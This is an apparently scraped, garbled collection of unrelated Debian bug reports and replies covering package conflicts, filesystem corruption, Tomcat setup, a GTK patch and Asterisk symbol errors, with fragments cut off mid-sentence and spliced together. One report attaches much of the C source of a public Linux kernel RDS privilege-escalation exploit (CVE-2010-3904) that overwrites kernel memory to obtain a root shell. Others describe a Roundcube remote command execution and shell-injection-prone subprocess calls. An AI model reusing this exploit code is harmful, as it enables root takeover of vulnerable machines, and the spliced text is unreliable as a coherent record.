Bug#905303: `/usr/share/bash-completion/completions/su` is owned by both util-linux and bash-completion
Package: util-linux Version: 2.32-0.3 Severity: critical -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Hello util-linux maintainer, Looping in the bash-completion maintainer too. On a Stretch system with: util-linux_2.32-0.3 bash-completion_1:2.1-4.3 I get an error performing a full-upgrade to Testing, as both packages own `/usr/share/bash-completion/completions/su`: ``` Preparing to unpack .../util-linux_2.32-0.3_amd64.deb ... Also, util-linux declares a Break and Conflicts with specific versions of bash-completion, so I have assumed that the bug report goes indeed against util-linux. I've carried out heavy tasks on the machine (compiling,etc), and apart from this everything looks fine. I was able to reproduce it again on my workstation configuration deployed into a fresh lxc container (using https://github.com/viccuad/salt-configs). There, uscan consumes all the cpu until it gets killed by zsh, and debsign the same. > On a side note, looking at the watchfile: > > (?:|.*/)guitarix2(?:[_\-]v?|)(\d[^\s/]*)\.(?:tar\.xz|txz|tar\.bz2|tbz2|tar\.gz|tgz) >... Package: accountsservice Version: 0.6.43-1 Severity: serious Summary: accounts-daemon.service fails to work properly when there are two users in the system with the same UID. The service is still running, but it shows an error message and makes unrelated software break: gdm3 waits indefinitely and does not start Xorg at boot time. After bringing up the VM the only thing I did was install firejail and tmux (the latter to test the bug) I first ran into this issue when attempting to install VirtualBox while I had a couple of applications open which were sandboxed by firejail: the installation failed as dpkg was not able to create the vboxusers group. The issue occurs regardless of the tool being sandboxed and (I believe) of the profile, as it also happens when firejail is run with the --noprofile switch. Thank you and regards.

Hi I guess if package 1.2.3 cannot be back ported to jessie due dependencies issues, and there is no exception that would leave jessie users to backport manually to 1.1.7 that includes the fix https://roundcube.net/news/2016/11/28/updates-1.2.3-and-1.1.7-released Issue it is quite severe, I wonder if they would reconsider the exception to stay on 1.1.X. Package: roundcube Version: 1.1.4+dfsg.1-1~bpo8+1 Severity: grave Tags: upstream security Justification: user security hole Dear Maintainer, I am reporting this as it is quite important as testing and unstable versions of roundcube are affected (and even all the backports offered, which hopefully will be updated via a bug report to the backport mailing list once the packages are upgraded or bug patch backported): "malicious user can execute arbitrary commands on the underlying operating system remotely, simply by writing an email in Roundcube 1.2.2 (>= 1.0)" "Requirements The vulnerability has the following requirements for exploitation: Roundcube must be configured to use PHP’s mail() function (by default, if no SMTP was specified 2 ) PHP’s mail() function is configured to use sendmail (by default, see sendmail_path 3 ) PHP is configured to have safe_mode turned off (by default, see safe_mode 4 ) An attacker must know or guess the absolute path of the webroot These requirements are not particular demanding which in turn means that there were a lot of vulnerable systems in the wild. " The usage of php mail function it is the default in the package. More details about this at: https://blog.ripstech.com/2016/roundcube-command-execution-via-email/#fn:1 So probably it is important to update to upstream version 1.2.3 Regards Juan.- -- System Information: Debian Release: 8.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 4.4.32-rh33-20161115070633.xenU.i386 (SMP w/4 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages roundcube depends on: ii roundcube-core 1.1.4+dfsg.1-1~bpo8+1 roundcube recommends no packages. roundcube suggests no packages. I have patched it at the Debian side (since it doesn't make sense to have it), and opened an issue upstream to discuss it [1]. > Also, what happened to removing use of shell=True? That is fixed on upstream's master, waiting to be released yet [2]. Bug#827445: python3-proselint: Remove `shell=True` as they are a security hazard
Package: python3-proselint Version: 0.5.3-2 Severity: serious Tags: security Justification: This a migration blocker bug, as this issue is already fixed in upstream's unreleased master. As said on Python's subprocess docs, using shell=True can be a security hazard[1], as they open the door to shell code injection. `shell=True` could for example be removed from: out = subprocess.check_output("proselint --version", shell=True) subprocess.call("proselint --debug >/dev/null", shell=True) These other examples are possibly vulnerable to shell code injection: out = subprocess.check_output("proselint {}".format(fullpath), shell=True) subprocess.call("{} {}".format("open", fullpath), shell=True) subprocess.call("proselint {} >/dev/null".format(filepath), shell=True) These other examples could maybe use python equivalents instead?: subprocess.call("find . -name '*.pyc' -delete", shell=True) subprocess.call("rm -rfv proselint/cache > /dev/null && mkdir -p {}".format(os.path.join(os.path.expanduser("~"), ".proselint")), shell=True) See also upstream's bug tracker [2]. Bug#741935: Is the avbin package still being maintained?
Hi, I'm Juan J. Martinez, one of the maintainers of pyglet upstream. I found this bug report and I'd like to add some information in case it helps. AVBin is technically optional for Pyglet, but in practice is a requirement as pyglet can only handle a very limited set of basic media formats and AVBin is required for anything else. Re: https://github.com/AVbin/AVbin/issues/41#issuecomment-10700404 AFAIK there are some issues with video support that are a blocker to get AVBin 11 out; but audio support is stable. Re: AVBin forking libav: "AVbin is designed to be used with a particular version of Libav. This version of Libav is included as a git submodule of the AVbin project under the libav directory. Note that this version of Libav may contain AVbin-specific patches, though we try to get all patches accepted upstream." When AVBin started libav was in continuous development and it was changing the API too often making difficult to track. Looks like the situation has changed and perhaps AVBin maintainer would be keen to start tracking one release branch of libav. I've contacted current AVBin maintainer upstream trying to get help from him regarding this issue. Bug#600757: linux-2.6: Linux RDS Protocol Local Privilege Escalation
Package: linux-2.6 Version: 2.6.32-5-686 Severity: critical Tags: security Justification: root security hole There is a security hole in all versions of linux-2.6 distributed by Debian. The attached exploit code can be used to test if a kernel is vulnerable, it starts a root shell. I test it in Debian Squeeze, a screenshot can be found in http://i56.tinypic.com/2nh19v6.png -- Juan Angulo Moreno /* * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit * CVE-2010-3904 * by Dan Rosenberg * * Copyright 2010 Virtual Security Research, LLC * * The handling functions for sending and receiving RDS messages * use unchecked __copy_*_user_inatomic functions without any * access checks on user-provided pointers. As a result, by * passing a kernel address as an iovec base address in recvmsg-style * calls, a local user can overwrite arbitrary kernel memory, which * can easily be used to escalate privileges to root. Alternatively, * an arbitrary kernel read can be performed via sendmsg calls. * * This exploit is simple - it resolves a few kernel symbols, * sets the security_ops to the default structure, then overwrites * a function pointer (ptrace_traceme) in that structure to point * to the payload. After triggering the payload, the original * value is restored. Hard-coding the offset of this function * pointer is a bit inelegant, but I wanted to keep it simple and * architecture-independent (i.e. no inline assembly). * * The vulnerability is yet another example of why you shouldn't * allow loading of random packet families unless you actually * need them. * * Greets to spender, kees, taviso, hawkes, team lollerskaters, * joberheide, bla, sts, and VSR * */ #include #include #include #include #include #include #include #include #include #include #include #define RECVPORT #define SENDPORT int prep_sock(int port) { int s, ret; struct sockaddr_in addr; s = socket(PF_RDS, SOCK_SEQPACKET, 0); if(s < 0) { printf("[*] Could not open socket.\n"); exit(-1); } memset(&addr, 0, sizeof(addr)); addr.sin_addr.s_addr = inet_addr("127.0.0.1"); addr.sin_family = AF_INET; addr.sin_port = htons(port); ret = bind(s, (struct sockaddr *)&addr, sizeof(addr)); if(ret < 0) { printf("[*] Could not bind socket.\n"); exit(-1); } return s; } void get_message(unsigned long address, int sock) { recvfrom(sock, (void *)address, sizeof(void *), 0, NULL, NULL); } void send_message(unsigned long value, int sock) { int size, ret; struct sockaddr_in recvaddr; struct msghdr msg; struct iovec iov; unsigned long buf; memset(&recvaddr, 0, sizeof(recvaddr)); size = sizeof(recvaddr); recvaddr.sin_port = htons(RECVPORT); recvaddr.sin_family = AF_INET; recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); memset(&msg, 0, sizeof(msg)); msg.msg_name = &recvaddr; msg.msg_namelen = sizeof(recvaddr); msg.msg_iovlen = 1; buf = value; iov.iov_len = sizeof(buf); iov.iov_base = &buf; msg.msg_iov = &iov; ret = sendmsg(sock, &msg, 0); if(ret < 0) { printf("[*] Something went wrong sending.\n"); exit(-1); } } void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock) { if(!fork()) { sleep(1); send_message(value, sendsock); exit(1); } else { get_message(addr, recvsock); wait(NULL); } } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) getroot(void * file, void * vma) { commit_creds(prepare_kernel_cred(0)); return -1; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr

Nothing > > [...] > > This is either a disk error or a filesystem inconsistency (found a bug in > the kernel, yay ^^). You should monitor your harddisk with SMART just in > case it is a hardware failure. Solved! :-) I rebooted the system, booting in recovery mode, started a root shell, umounted /usr and ran "fsck.ext3 -p -f -c /dev/hda2". Fsck fixed some inconsistencies and errors in filesystem and everything is now fine (after reinstalling some packages, being systemsettings one of them). The only question being open is now: why in booting sequence, system says that /dev/hda2 was clean? There were indeed errors in filesystem :-? Bug report against what? fsck? :? I think this is a serious issue... Thanks a lot! > Regards > -- > Xavier Vello Best regards, -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Bug#519570: [Pkg-samba-maint] Bug#519570: Kerberos working on samba 3.2.5, PDC, but failing when joining the domain
Hello. I am using a setup as described on this bug report, and I am experiencing the bug Eduardo reported. The point is that Samba 3.2/3.3 file server (no matter if it's a PDC, BDC or workstation acting as a file server) requests a different kerberos ticket to the KDC, depending whether the PDC has joined the domain itself serves, or not. Maybe Samba developers have done it on purpose, or maybe it is a bug. The problem is that one enctype is supported by Heimdal, and the other is not. I tried to report this to Samba team, but I got no reply, maybe because I was not able to explain the bug properly. If you are going to make a proper bug report, could you please post the link here, so we can follow it? Thank you very much. Bug#508565: f2c: does not translate properly in EMT64 machines
Subject: f2c: does not translate properly in EMT64 machines Package: f2c Version: 20050501-1 Severity: grave Justification: renders package unusable *** Please type your report below this line *** I use a combination of f2c and gcc compilations to compile and then execute a C program which uses a fotran 77 subroutine. The sequence is simple: 1) I execute the script containing: f2c -f coeff_rot_nadl_juan.f gcc -c -O5 coeff_rot_nadl_juan.c 2) Then I compile and main program and executes it using: gcc -o filou_exe -O5 oscillations.c coeff_rot_nadl_juan.o -lm -lf2c\ && filou_exe where the fortran routine is "coeff_rot_nadl_juan.f", and the main program (written in C) is "oscillations.c" This works properly in my i386 machine (with ETCH), but it doesn't in my amd64 machine. In amd64 case: (1) and (2) compiles with no errors (and no warnings neither), but it crashes when I execute the program (i.e. when I execute filou_exe) The errors produced are: " structure input model type: CESAM5.* fmt: read unexpected character apparent state: unit 37 named gr1r_s3.osc last format: (4i10) lately reading sequential formatted external IO Aborted " The errors are all referred to readout an ASCII file ("gr1r_s3.osc") containing both numbers and strings (with scientific formats) So it seems that there is a problem when translating to C or when compling with gcc this translated into C code. While I can easily remove the rpath as > explained at [3], I'll wait for upstream's voice :-) As I said, we stopped using rpath some time ago. Any traces of it should probably be removed but we are not in a hurry because those flags are not used by the ECL compiler / linker. Adding the rpath flag for platforms or users that consider it useful is not difficult and can be done via LDFLAGS at configuration time. Bug#425899: Tomcat Native Library problems
I have use the tomcat5.5-20-5 with the libtomcat5.5.20-5 and I installed jsvc 1.0.2~... And still having the same problem.
Bug#425899: Tomcat Native Library problems
Hello Marcus, I'm still with problems with Tomcat5.5.20-2. I have the following installation. Debian 4.0 ethc for AMD64 adduser 3.102 apache2-utils 2.2.3-4 apache2.2-common 2.2.3-4 ecj-bootstrap 3.2.1-3 sun-java5-jre 1.5.0-10-3 sun-java5-bin 1.5.0-10-3 libtomcat5.5-java 5.5.20-2 java-gcj-compat-dev 1.0.65-10 jsvc 1.0.1-3 From the suggested package I haven't installed yet the following: libapache-mod-jk libapache2-mod-jk tomcat5.5-admin tomcat5.5-webapps Once I had all the required packages I installed tomcat5.5 stable but it doesn't start, because in the log file you can see that the tomcat native library is not in the path: The Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.10/jre/lib/amd64/server:/usr/lib/jvm/java= - 1.5.0-sun-1.5.0.10/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.10 /jre/../lib/amd64 I discovered that the library must be installed with the following instructions: Download the tomcat native library (the version 1.1.4 because someone say that this is the right) http://www.apache.org/dist/tomcat/tomcat-connectors/native/tomcat-native-1.= 1.4.tar.gz tar xvf tomcat-native-1.1.4.tar.gz mkdir /usr/lib/jvm/java-1.5.0-sun/include ln -s /usr/lib/gcc/x86_64-linux-gnu/4.1.2/include/jni_md.h /usr/lib/jvm/java-1.5.0-sun/include/jni_md.h This is because the tomcat-native need this link in the configure cd tomcat-native-1.1.4/jni/native ./configure --with-apr=3D/usr/bin/apr-config --with-java-home=3D/usr/lib/jvm/java-1.5.0-sun make make install In this point someone says that tomcat start with the actualization of the LD_LIBRARY_PATH, I was trying to actualize this in the /etc/default/tomcat5.5 but it doesn't work, and then in the /etc/init.d/tomcat5.5, but again it doesn't work. Actually I'll go on trying, but if you have solution to this, I would appreciate it. Thanks. -- Juan Fernando Jaramillo Gerente Tecnología MIG Internacional www.miginternacional.com Bogotá, Colombia
Bug#403574: gtkpod still uninstallable
Package: gtkpod Followup-For: Bug #403574 I can't install this package (I use Debian testing). Whenever I select the package for installing with dselect, I can't. Simply says: Dependency problem: --- gtkpod depende de libgpod0 gtkpod entra en conflicto con libgpod0 (>= 0.4.0) It can be translated to: gtkpod depends on libgpod0 gtkpod conflicts with libgpod0 (>= 0.4.0) Is it possible that a package conflicts with another package which depends on? In fact, there is no other libgpod0. I see that this bug has been solved, but I suppose that it has been solved in sid, no in testing, hasn't been? When will the proper package arrive to etch? Let's see with apt-get (it says "broken packages"): # apt-get install gtkpod Leyendo lista de paquetes... Bug#368229: Backends libraries missing?
The problem is in libgbf-1-0 package from gnome-build source package Looking at gnome-build sources it seems that libgbf-am.so and libgbf-mkfile.so should be somewhere but they arent. So gbf_backend_get_backends () returns NULL because no backend is found and anjuta cant load the project :( I you install gnome-build from sources, backends are installed in /usr/lib/gnome-build-1.0/backends/ and everything works fine :) greets Juan Pablo ___ 1GB gratis, Antivirus y Antispam Correo Yahoo!, el mejor correo web del mundo http://correo.yahoo.com.ar -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Bug#354654: general: fat32 gets corrupted
Hello, Since I have the need to continue to work with my machine1, I finally did an apt-get dist-upgrade for machine1, and installed debian kernel 2.6.15-1-686. I erased fat32 partition and replaced it by a ext2 and give access to it from windows using fs-driver. I will see if problems are still present (if I continue to loose directories). In machine2 I will also upgrade the kernel but without erasing the fat32, to have a chance to see if the problems comes from the kernel. I will also remove hdparm from machine2, if the kernel is not the problem. I will let you know what are the results in the coming weeks, because if it is a bug it worth to be reported. All the best, Juan. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Did you see any corruption in your files? I mean > data corrupted instead of metadata? * IN MACHINE1: In machine1, the files that were recovered after the crash were converted to 8 characters dos names, but the files I tried to open were ok (I can not open all of them since this is 10GB). There were some unrecoverable files (following the recover soft said) but I suppose these were previously deleted files that were partially overwritten before the crash. I never saw a file simply corrupted but still existing in machine1: simply they were ok, then suddenly a whole directory was lost. One thing I remember now is that I installed smartools in machine1 two months before the crash (the disk was 2 years in use without problems before), but this is maybe unrelated with the crash. * IN MACHINE2: Here, the most recent files that were lost and after that recovered were totally corrupted. However we avoided to write on the disk with linux, and the disk recovery function of windows (the "System Volume Information") was disabled. > > Also, you say that sata does not support smart. I can try to install a more recent kernel to make smart working, but the disk is new, is it useful? I have another question: why did etch installer chose the 2.6.12-1-386 kernel? Why not the 686? Maybe installing 686 can help? However this problem in machine2 remains classified as a bug and not as a problem related to user choices? > > As for the udma crc? That is pretty odd that you see the thig > on two different system though. So it seems that I have two different problems in the two machines? (And I still consider the 2.6 as being a > development version) So if you install a very recent kernel from kernel.org, you have to apply a lot of patches before having it working? Is it better that I install a stock 2.4 debian kernel on machine2? It can be difficult to downgrade from 2.6 to 2.4 (udev, etc). Thanks, Juan.
Bug#354654: general: fat32 gets corrupted
Hello Cesare, In machine1 hdparm is not currently installed, but it was 1 year ago when the machine1 had woody installed. I suppose hdparm does not change anything to the disk itself but only to the ide modules of the kernel? In machine2, hdparm is installed, but I do not remember to have changed anything to the configuration of it (the log file I was maintaining for machine2 was lost during the disk crash). Do I have to check something or simply uninstall it? Thanks for your reply, Juan. Bug#354654: general: fat32 gets corrupted
Package: general Severity: critical Dear all, I had two vfat crashes, rather similar in two machines (laptops) with debian, dual boot windows xp: - machine1 (compaq nx9010 with celeron): ide disk 30GB (-- System Information: Debian Release: 3.1, Architecture: i386 (i686), Kernel: Linux 2.6.8-1-686, Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15), libc6 Version: 2.3.2.ds1-22) - machine2 (ibm thinkpad r52 with pentium M): etch, kernel: 2.6.12-1-386, sata disk 80GB, (no physical access at the moment to this machine so no way for more system information). In machine1 vfat, 40% of directories where lost (however recoverable under windows using a commercial crash recovery soft). In machine2, 100% was lost in a first crash, but it is random, since the problem is repeating from time to time, and not always everything is lost. Sometimes we lost what was used the day before, and sometimes everithing except the files we used. Lost directories are not located always at the same level. I do not find any logical explanation. No strange message in syslog, we used "normal" programs (konqueror, thunderbird, oowriter) when sudenly when try to save a file or read mail, an error appears just saying that the directories did not exist any more. In both cases, fat32 was formated under windows. I had smartd running on machine1, nothing strange (maybe a high temperature of the disk +-53°C). On machine2, smartd is not installable since it does not work with sata. Here below the fstab files, plus a smart test on machine1. It was difficult to install sata support in machine2, the strange procedure I used is also described below. Bug#343998: Patch
I found that anjuta Version: 2.0.1-2 has the same bug because both anjuta-encodings.c are basically the same. I notice this bug when libgtk was updated to version 2.8.9-2 I think this is because in version 2.8 gtk triggers a "changed" signal on the selection object of the treeview when setting the model (gtk_tree_view_set_model) So when on_stock_selection_changed() try to access anjuta_encodings_dialog>add_button (which is not set until the end of anjuta_encodings_init) gives the segfault. greets Juan Pablo --- src/anjuta-encodings.c 2005-12-19 13:59:47.0 -0300 +++ src/anjuta-encodings_jp.c 2005-12-19 14:00:52.0 -0300 @@ -697,6 +697,15 @@ up_button = glade_xml_get_widget (gxml, "up_button"); down_button = glade_xml_get_widget (gxml, "down_button"); + anjuta_encodings_dialog = g_new0 (AnjutaEncodingsDialog, 1); + anjuta_encodings_dialog->pref = pref; + anjuta_encodings_dialog->add_button = add_button; + anjuta_encodings_dialog->remove_button = remove_button; + anjuta_encodings_dialog->up_button = up_button; + anjuta_encodings_dialog->down_button = down_button; + anjuta_encodings_dialog->supported_treeview = supported_treeview; + anjuta_encodings_dialog->stock_treeview = stock_treeview; + /* Add the encoding column for stock treeview*/ cell = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes (_("Stock Encodings"), @@ -757,13 +766,4 @@ gtk_widget_set_sensitive (remove_button, FALSE); gtk_widget_set_sensitive (up_button, FALSE); gtk_widget_set_sensitive (down_button, FALSE); - - anjuta_encodings_dialog = g_new0 (AnjutaEncodingsDialog, 1); - anjuta_encodings_dialog->pref = pref; - anjuta_encodings_dialog->add_button = add_button; - anjuta_encodings_dialog->remove_button = remove_button; - anjuta_encodings_dialog->up_button = up_button; - anjuta_encodings_dialog->down_button = down_button; - anjuta_encodings_dialog->supported_treeview = supported_treeview; - anjuta_encodings_dialog->stock_treeview = stock_treeview; }

Bug#318189: asterisk-oh323: chan_oh323.so cannot find symbol and Asterisk crashes
Package: asterisk-oh323 Version: 0.6.6pre3-3 Severity: grave Justification: renders package unusable The asterisk-oh323 package version 0.6.6pre3-3 was linked expecting the ast_smoother_feed symbol to be in the /usr/sbin/asterisk executable. The problem is that the symbol is present as __ast_smoother_feed and thus chan_oh323.so does not find it. Because of this, when Asterisk starts and tries to load the chan_oh323.so module it aborts because the symbol cannot be found. The following error message is logged to /var/log/asterisk/messages when this happens: Jul 13 19:37:26 WARNING[2373]: /usr/lib/asterisk/modules/chan_oh323.so: undefined symbol: ast_smoother_feed Jul 13 19:37:26 WARNING[2373]: Loading module chan_oh323.so failed! The problem can be seen by running these commands: # objdump -T /usr/sbin/asterisk | grep ast_smoother_feed 08054698 gDF .text 01bd Base__ast_smoother_feed ~# objdump -T /usr/lib/asterisk/modules/chan_oh323.so | grep ast_smoother_feed D *UND* ast_smoother_feed Looking at the Asterisk headers it looks like the asterisk package is at fault, because in line 378 of /usr/include/asterisk/frame.h the function's prototype is: extern int ast_smoother_feed(struct ast_smoother *s, struct ast_frame *f); A workaround to this problem without uninstalling asterisk-oh323 is to add the following line to /etc/asterisk/modules.conf: noload => chan_oh323.so -- System Information: Debian Release: testing/unstable APT prefers stable APT policy: (990, 'stable'), (500, 'unstable'), (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.11-1-k7 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages asterisk-oh323 depends on: ii asterisk1:1.0.9.dfsg-1 open source Private Branch Exchang ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an ii libexpat1 1.95.8-3 XML parsing C library - runtime li ii libldap22.1.30-11OpenLDAP libraries ii libopenh323-1.1 1.15.3-2 H.323 aka VoIP library ii libpt-1.8.3 1.8.4-1 Portable Windows Library ii libsasl22.1.19-1.5 Authentication abstraction library ii libsdl1.2debian 1.2.7+1.2.8cvs20041007-5 Simple DirectMedia Layer ii libssl0.9.7 0.9.7e-3 SSL shared libraries ii libstdc++5 1:3.3.5-13 The GNU Standard C++ Library v3 asterisk-oh323 recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe".
